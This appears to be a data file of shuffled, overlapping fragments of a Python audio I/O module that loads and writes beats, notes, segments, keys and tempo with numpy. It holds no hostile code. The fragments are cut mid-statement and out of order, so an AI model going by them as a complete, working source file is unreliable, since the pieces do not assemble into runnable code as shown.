Returns", "needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a", "f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to a", "AttributeError: string = e except TypeError: string = fmt % e f.write(bytes((string +", "file, one segment per line. Each segment is of form <start> <end> <label>,", "Open file (handle). \"\"\" # check if we need to open the file", "> t2: t1, t2, strength = t2, t1, 1. - strength # format", "Report the lower tempo first (as required by MIREX). Returns ------- tempo_1 :", "> `split_value` are interpreted as tempi [bpm], `values` <= `split_value` are interpreted as", "'start' contains the start position (e.g. seconds), 'end' the end position, and 'label'", "mode='r'): \"\"\" Context manager which yields an open file or handle with the", "1] == 1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats, filename,", "as numpy structured array with three named columns: 'start' contains the start position", "def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file.", "to read the labelled segments from. Returns ------- segments : numpy structured array", "which keeps the order of the keys in case of duplicate keys #", "(second column) is returned. \"\"\" # try to load the data from file", "if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings", "apply this '(-strengths)' trick because we want # tempi with uniformly distributed strengths", "only the first column is returned. \"\"\" # read in the events, one", "separating columns. header : str, optional String that will be written at the", "events to a file, one event per line. Parameters ---------- events : numpy", "delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters ---------- beats :", "len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. 
- strength_sum) if np.any(strengths", "Returns ------- tempo_1 : float The most dominant tempo. tempo_2 : float The", "tempi by their strength. norm_strengths : bool, deprecated Normalize the strengths to sum", "`values` <= `split_value` are interpreted as strengths. sort : bool, deprecated Sort the", "because we want a stable sorting algorithm # which keeps the order of", "for MIREX, the lower tempo must be given first if mirex is not", "between tempi and strengths. `values` > `split_value` are interpreted as tempi [bpm], `values`", "version 0.16 ' 'and will be removed in version 0.17. Please sort the", "values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a", "must be positive') # no strength is given, assume an evenly distributed one", ": numpy array Array with the detected tempi (first column) and their strengths", ".audio import load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types", "of version 0.16 and will be ' 'removed in 0.18. Please sort the", ": str or file handle Output filename or handle. fmt : str or", "which case `delimiter` is ignored. delimiter : str, optional String or character separating", "position (e.g. seconds), 'end' the end position, and 'label' the segment label. \"\"\"", "first if mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated as", "instead of beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1)", "and additional columns are ignored, i.e. only the first column is returned. \"\"\"", "array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "Please sort the returned array ' 'separately.') # Note: use 'mergesort', because we", "str or file handle File to load the notes from. 
Returns ------- numpy", "mirex : bool, deprecated Report the lower tempo first (as required by MIREX).", "import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and will", "# return at most 'max_len' tempi and their relative strength if max_len is", "write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters", "t1 = tempi[0][0] strength = 1. # consider only the two strongest tempi", "of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in", "t1, 1. - strength # format as a numpy array and write to", "line events = np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the", "of the beats, they are filtered to contain only the downbeats (i.e. only", "be written to file. filename : str or file handle File to write", ": numpy array Beats or downbeats to be written to file. filename :", "format 'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle File to", "interpreted as strengths. sort : bool, deprecated Sort the tempi by their strength.", "0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi,", "# try to load the data from file values = np.loadtxt(filename, ndmin=1) #", "File (handle) to open. mode: {'r', 'w'} Specifies the mode in which the", "file. filename : str or file handle File to write the events to.", "dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label return segments def", "Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\"", "= None # yield an open file handle yield f # close the", "1: if downbeats: # rows with a \"1\" in the 2nd column are", "handle File to read key information from. Returns ------- str Key. 
\"\"\" with", "must be given first if mirex is not None: import warnings warnings.warn('`mirex` argument", ": bool, deprecated Normalize the strengths to sum 1. max_len : int, deprecated", ": str or file handle File to load the beats from. downbeats :", "events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to", "'max_len' tempi and their relative strength if max_len is not None: import warnings", "Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array with tempi. If", "is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords", "'%.3f %.3f'), in which case `delimiter` is ignored. delimiter : str, optional String", "filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one", "utf-8 \"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import io", "file. header : str, optional String that will be written at the beginning", "one event per line. Parameters ---------- events : numpy array Events to be", "shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str", "1. - strength # format as a numpy array and write to output", "keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] #", "import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will be", "Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. 
filename : str or file handle", "'mergesort', because we want a stable sorting algorithm # which keeps the order", "is the beat time, the rest is ignored return values[:, 0] return values", "form <start> <end> <label>, where <start> and <end> are floating point numbers, and", "is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename):", "sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file. Tempo information", "contextlib import numpy as np from .audio import load_audio_file from .midi import load_midi,", "file handle yield f # close the file if needed if fid: fid.close()", "sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f", "mode: {'r', 'w'} Specifies the mode in which the file is opened. Yields", "filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file, one event", "---------- filename : str or file handle File to load the beats from.", "filename : str or file handle File to load the events from. Returns", "as comment. mirex : bool, deprecated Report the lower tempo first (as required", "filename fid = None # yield an open file handle yield f #", "than tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. -", "sum(tempi[:2, 1]) # for MIREX, the lower tempo must be given first if", "the mode in which the file is opened. Yields ------ Open file (handle).", "array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename :", "are ignored, i.e. only the first column is returned. \"\"\" # read in", "one tempo was detected if len(tempi) == 1: t1 = tempi[0][0] strength =", "(-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi", "# which keeps the order of the keys in case of duplicate keys", "to a file. Parameters ---------- key : str Key name. 
filename : str", "t1, t2, strength = t2, t1, 1. - strength # format as a", "strengths if sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16 and", "name. filename : str or file handle Output file. header : str, optional", "will be written at the beginning of the file as comment. \"\"\" events", "beats : numpy array Beats to be written to file. filename : str", "----- If `beats` contains both time and number of the beats, they are", "handle. fmt : str or sequence of strs, optional A sequence of formats", "tempi with uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi", "the keys in case of duplicate keys # but we need to apply", "1-dimensional array of length 'num_tempi' is returned. If strengths are given, a 2D", "if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a text", "1] == 1][:, 0] else: # 1st column is the beat time, the", "downbeats: # rows with a \"1\" in the 2nd column are downbeats return", "fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events", "and the relative strength to a file. Parameters ---------- tempi : numpy array", "by their strength. norm_strengths : bool, deprecated Normalize the strengths to sum 1.", "file. Tempo information must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']]", "tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo must be", "filename : str or file handle File to write the beats to. 
fmt", "write header if header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING)))", "= load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key from the", "raise AssertionError('strengths must be positive') # no strength is given, assume an evenly", "'label' needs to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float),", "\"\"\" # try to load the data from file values = np.loadtxt(filename, ndmin=1)", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters ----------", "the file as comment. \"\"\" events = np.array(events) # reformat fmt to be", "given file, one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters", "the times of those beats with a beat number of 1). \"\"\" if", "str or file handle File to write the beats to. fmt : str", "load_segments(filename): \"\"\" Load labelled segments from file, one segment per line. Each segment", "and strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength =", "to file. filename : str or file handle File to write the events", "_io.open(filename, mode) else: f = filename fid = None # yield an open", "None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load", "load the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True)", "File to read the labelled segments from. Returns ------- segments : numpy structured", "notes : numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration'", "and their relative strengths (second column) is returned. \"\"\" # try to load", "of duplicate keys # but we need to apply this '(-strengths)' trick because", "fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters ---------- beats", "file. 
Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes, row format", "str or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%d',", "def load_segments(filename): \"\"\" Load labelled segments from file, one segment per line. Each", "beginning, end, and label of segments. \"\"\" start, end, label = [], [],", "data from file values = np.loadtxt(filename, ndmin=1) # split the filename according to", "\"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0] if", "one segment per line. Each segment is of form <start> <end> <label>, where", "array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "= label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled", "norm_strengths : bool, deprecated Normalize the strengths to sum 1. max_len : int,", "sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16 and will be", "- len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths <", "file. Parameters ---------- beats : numpy array Beats to be written to file.", "not None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will", "handle File to load the events from. Returns ------- numpy array Events. Notes", "write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo", "= write_segments def load_key(filename): \"\"\" Load the key from the given file. Parameters", "tempo. strength : float Their relative strength. \"\"\" # make the given tempi", "----- Comments (lines starting with '#') and additional columns are ignored, i.e. only", "delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters ---------- segments :", "written at the beginning of the file as comment. 
mirex : bool, deprecated", "their filename into tempi and strengths # TODO: this is kind of hack-ish,", "at most `max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2])", "file as comment. \"\"\" events = np.array(events) # reformat fmt to be a", "Please sort the ' 'tempi manually') if t1 > t2: t1, t2, strength", "at the beginning of the file as comment. Returns ------- numpy structured array", "Parameters ---------- beats : numpy array Beats to be written to file. filename", "of 1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:,", "length') # order the tempi according to their strengths if sort: import warnings", "single string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write", "header) def load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters ----------", "\"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the", "have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename :", "the detected tempi (first column) and their strengths (second column). filename : str", "Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim >", "downbeats to a file. Parameters ---------- beats : numpy array Beats or downbeats", "def load_key(filename): \"\"\" Load the key from the given file. Parameters ---------- filename", "comment. Notes ----- If `beats` contains both time and number of the beats,", "load_key(filename): \"\"\" Load the key from the given file. Parameters ---------- filename :", "fmt : str or sequence of strs, optional A sequence of formats (e.g.", "string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output", "A single format (e.g. 
'%.3f'), a sequence of formats, or a multi-format string", "'utf8' # dtype for numpy structured arrays that contain labelled segments # 'label'", "filtered to contain only the downbeats (i.e. only the times of those beats", "lower tempo first (as required by MIREX). Returns ------- tempo_1 : float The", "0.18. Please sort the returned array ' 'separately.') # Note: use 'mergesort', because", "\"\"\" # make the given tempi a 2d array tempi = np.array(tempi, ndmin=2)", "same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same", "= [('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in open() to", "with tempi (first column) and their relative strengths (second column) is returned. \"\"\"", "the file as comment. Returns ------- key : str Key name. \"\"\" write_events([key],", "= 'utf8' # dtype for numpy structured arrays that contain labelled segments #", "1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter,", "tempo_2 : float The second most dominant tempo. strength : float Their relative", "# 1st column is the event's time, the rest is ignored return events[:,", "a file. Parameters ---------- beats : numpy array Beats to be written to", "beats with a beat number of 1). \"\"\" if beats.ndim == 2: beats", "if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim", "of beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if", "most dominant tempi and the relative strength to a file. Parameters ---------- tempi", "[] with open_file(filename) as f: for line in f: s, e, l =", "reformat fmt to be a single string if needed if isinstance(fmt, (list, tuple)):", "file as comment. \"\"\" if fmt is None and beats.ndim == 2: fmt", "contains the start position (e.g. seconds), 'end' the end position, and 'label' the", "Array with tempi. 
If no strength is parsed, a 1-dimensional array of length", "represented as numpy structured array with three named columns: 'start' contains the start", "of strs, optional A single format (e.g. '%.3f'), a sequence of formats (e.g.", "a 2D array with tempi (first column) and their relative strengths (second column)", "warnings warnings.warn('`sort` is deprecated as of version 0.16 and will be ' 'removed", "tempo_1 : float The most dominant tempo. tempo_2 : float The second most", "print_function import io as _io import contextlib import numpy as np from .audio", "of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f", "numpy array Beats to be written to file. filename : str or file", "division, print_function import io as _io import contextlib import numpy as np from", "io as _io import contextlib import numpy as np from .audio import load_audio_file", "is parsed, a 1-dimensional array of length 'num_tempi' is returned. If strengths are", "or file handle File to read the labelled segments from. Returns ------- segments", "arrays that contain labelled segments # 'label' needs to be castable to str", "_io import contextlib import numpy as np from .audio import load_audio_file from .midi", ": str or file handle File to write the notes to. fmt :", "or handle with the given mode and closes it if needed afterwards. Parameters", "from. Returns ------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def", "as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to", "warnings.warn('`max_len` is deprecated as of version 0.16 and will be ' 'removed in", "== 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise", "(handle). \"\"\" # check if we need to open the file if isinstance(filename,", "the tempi by their strength. 
norm_strengths : bool, deprecated Normalize the strengths to", "write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file, one", "multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter", "key information from. Returns ------- str Key. \"\"\" with open_file(filename) as f: return", "strength = t2, t1, 1. - strength # format as a numpy array", "Their relative strength. \"\"\" # make the given tempi a 2d array tempi", "import load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING", "Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename : str or", "columns: 'start' contains the start position (e.g. seconds), 'end' the end position, and", "given first if mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated", "Returns ------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key,", "line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file", "end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label']", "ndmin=1) # split the filename according to their filename into tempi and strengths", "of the file as comment. Returns ------- numpy structured array Labelled segments Notes", "'separately.') strengths /= float(strength_sum) # tempi and strengths must have same length if", "= np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows with a", "%d %.3f %d', in which case `delimiter` is ignored. delimiter : str, optional", "Input/output package. 
\"\"\" from __future__ import absolute_import, division, print_function import io as _io", "that contain labelled segments # 'label' needs to be castable to str SEGMENT_DTYPE", "header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given file, one", "the beginning of the file as comment. Notes ----- If `beats` contains both", "string_types): f = fid = _io.open(filename, mode) else: f = filename fid =", "Notes ----- Labelled segments are represented as numpy structured array with three named", "strengths. sort : bool, deprecated Sort the tempi by their strength. norm_strengths :", "fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters ---------- notes", "np.array(tempi, ndmin=2) # default values t1 = t2 = strength = np.nan #", "write the beats to. fmt : str or sequence of strs, optional A", "output with open_file(filename, 'wb') as f: # write header if header is not", "tempo. tempo_2 : float The second most dominant tempo. strength : float Their", "per line. Parameters ---------- filename : str or file handle File to load", "numpy structured array Structured array with columns 'start', 'end', and 'label', containing the", "the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str", "be ' 'removed in 0.18. Please sort the returned array ' 'separately.') #", "segments Notes ----- Labelled segments are represented as numpy structured array with three", "l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start", "\"\"\" events = np.array(events) # reformat fmt to be a single string if", "a numpy array and write to output out = np.array([t1, t2, strength], ndmin=2)", "mode in which the file is opened. Yields ------ Open file (handle). 
\"\"\"", "delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and the relative strength", "[], [] with open_file(filename) as f: for line in f: s, e, l", "= tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi and their", "labelled segments from. Returns ------- segments : numpy structured array Structured array with", "\"\"\" Write the downbeats to a file. Parameters ---------- beats : numpy array", "header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key", "strengths = values[values <= split_value] # make the strengths behave properly strength_sum =", "'label', containing the beginning, end, and label of segments. \"\"\" start, end, label", "Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename,", "(e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter : str,", "# relative strengths are given (one less than tempi) if len(tempi) - len(strengths)", "---------- key : str Key name. filename : str or file handle Output", "the file as comment. Notes ----- If `beats` contains both time and number", "@suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file, one", "point numbers, and <label> is a string. Parameters ---------- filename : str or", "file handle File to write the notes to. fmt : str or sequence", "given, assume an evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi)", "multi-format string (e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter :", "TODO: this is kind of hack-ish, find a better solution tempi = values[values", "strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must", "file handle Output file. 
header : str, optional String that will be written", "header : str, optional String that will be written at the beginning of", "return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to", "we want a stable sorting algorithm # which keeps the order of the", "1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1])", "format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format", "ndmin=2) # 1st column is the event's time, the rest is ignored return", "tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array with tempi.", "(i.e. only the times of those beats with a beat number of 1).", "sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']),", "the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as", "strength = 1. # consider only the two strongest tempi and strengths elif", "1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo must be given", "filename into tempi and strengths # TODO: this is kind of hack-ish, find", "Return at most `max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[,", "tempi : numpy array, shape (num_tempi[, 2]) Array with tempi. If no strength", "' 'will be removed in 0.18. Please normalize strengths ' 'separately.') strengths /=", "downbeats : bool, optional Load only downbeats instead of beats. Returns ------- numpy", "in the 2nd column are downbeats return values[values[:, 1] == 1][:, 0] else:", "0.16 and ' 'will be removed in 0.18. Please normalize strengths ' 'separately.')", "have same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have", "handle File to load the downbeats from. Returns ------- numpy array Downbeats. \"\"\"", "Output filename or handle. fmt : str or sequence of strs, optional A", "Key name. 
\"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None):", "raise ValueError('unknown format for `notes`') # truncate format to the number of colums", "segments from. Returns ------- segments : numpy structured array Structured array with columns", "Key name. filename : str or file handle Output file. header : str,", "delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given file,", "'removed in 0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T", "to open. mode: {'r', 'w'} Specifies the mode in which the file is", "try: string = fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError:", "delimiter : str, optional String or character separating columns. header : str, optional", "# tempi with uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort')", "beginning of the file as comment. mirex : bool, deprecated Report the lower", "fmt = ['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename,", "filename : str or file handle Output file. header : str, optional String", "of strs, optional A single format (e.g. '%.3f'), a sequence of formats, or", "['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which case `delimiter`", "def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file, one beat", "with tempi. If no strength is parsed, a 1-dimensional array of length 'num_tempi'", "If no strength is parsed, a 1-dimensional array of length 'num_tempi' is returned.", "Specifies the mode in which the file is opened. Yields ------ Open file", "tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi and", "float Their relative strength. \"\"\" # make the given tempi a 2d array", "file (handle). 
\"\"\" # check if we need to open the file if", "the tempi according to their strengths if sort: import warnings warnings.warn('`sort` is deprecated", "load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING =", "to their strengths if sort: import warnings warnings.warn('`sort` is deprecated as of version", "filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the", "the beats, they are filtered to contain only the downbeats (i.e. only the", "def load_events(filename): \"\"\" Load a events from a text file, one floating point", "1st column is the beat time, the rest is ignored return values[:, 0]", ": str, optional String or character separating columns. header : str, optional String", "object)] # overwrite the built-in open() to transparently apply some magic file handling", "and strengths. `values` > `split_value` are interpreted as tempi [bpm], `values` <= `split_value`", "['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f %d',", "write events for e in events: try: string = fmt % tuple(e.tolist()) except", "# for MIREX, the lower tempo must be given first if mirex is", "= filename fid = None # yield an open file handle yield f", "open file or handle with the given mode and closes it if needed", "f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE)", "the downbeats (i.e. only the times of those beats with a beat number", "2]) Array with tempi. If no strength is parsed, a 1-dimensional array of", "given tempi a 2d array tempi = np.array(tempi, ndmin=2) # default values t1", "and label of segments. \"\"\" start, end, label = [], [], [] with", "delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters ---------- beats :", "the order of the keys in case of duplicate keys # but we", "from the given file. 
Tempo information must have the following format: 'main tempo'", "uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx]", ": numpy structured array Structured array with columns 'start', 'end', and 'label', containing", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters ----------", "Load the key from the given file. Parameters ---------- filename : str or", "# close the file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\"", "t1, t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) #", "/ float(len(tempi)) # normalize the strengths if norm_strengths is not None: import warnings", "deprecated as of version 0.16 ' 'and will be removed in version 0.17.", "a events from a text file, one floating point number per line. Parameters", "fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError: string = fmt", "have same length') # order the tempi according to their strengths if sort:", "containing the beginning, end, and label of segments. \"\"\" start, end, label =", "strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of", "ignored. delimiter : str, optional String or character separating columns. header : str,", "that will be written at the beginning of the file as comment. mirex", "not notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate format to", "A single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or", "numpy array Beats or downbeats to be written to file. filename : str", "events for e in events: try: string = fmt % tuple(e.tolist()) except AttributeError:", "stable sorting algorithm # which keeps the order of the keys in case", "Each segment is of form <start> <end> <label>, where <start> and <end> are", "they are filtered to contain only the downbeats (i.e. 
only the times of", "strengths must have same length') # order the tempi according to their strengths", "array with columns 'start', 'end', and 'label', containing the beginning, end, and label", "following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or", "first column is returned. \"\"\" # read in the events, one per line", "= np.array(tempi, ndmin=2) # default values t1 = t2 = strength = np.nan", "written at the beginning of the file as comment. \"\"\" if fmt is", "row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle File", "numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if", "strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if", "string (e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter : str,", "of the file as comment. Notes ----- If `beats` contains both time and", "Parameters ---------- filename : str or file handle File to load the events", "---------- beats : numpy array Beats or downbeats to be written to file.", "if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths", "file values = np.loadtxt(filename, ndmin=1) # split the filename according to their filename", "start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end", "filename : str or file handle File to write the events to. fmt", "f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename,", "Returns ------- numpy array Notes. 
\"\"\" # set default format if fmt is", "\"\"\" from __future__ import absolute_import, division, print_function import io as _io import contextlib", "segments['end'] = end segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t',", "tempo' ['relative_strength']] Parameters ---------- filename : str or file handle File to load", "as of version 0.16 and will be ' 'removed in 0.18. Please truncate", "line. Parameters ---------- events : numpy array Events to be written to file.", "events to. fmt : str or sequence of strs, optional A single format", "the given file. Parameters ---------- filename : str or file handle File to", "or file handle File to write the beats to. fmt : str or", "starting with '#') and additional columns are ignored, i.e. only the first column", "handle Output file. delimiter : str, optional String or character separating columns. header", "column are downbeats return values[values[:, 1] == 1][:, 0] else: # 1st column", "= start segments['end'] = end segments['label'] = label return segments def write_segments(segments, filename,", ": int, deprecated Return at most `max_len` tempi. Returns ------- tempi : numpy", "which the file is opened. Yields ------ Open file (handle). \"\"\" # check", "to load the data from file values = np.loadtxt(filename, ndmin=1) # split the", "'%d']), or a multi-format string, e.g. '%.3f %d %.3f %d', in which case", "default values t1 = t2 = strength = np.nan # only one tempo", "None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will", "tempi and strengths # TODO: this is kind of hack-ish, find a better", "start position (e.g. seconds), 'end' the end position, and 'label' the segment label.", "---------- filename : str or file handle File to read key information from.", "to read key information from. Returns ------- str Key. 
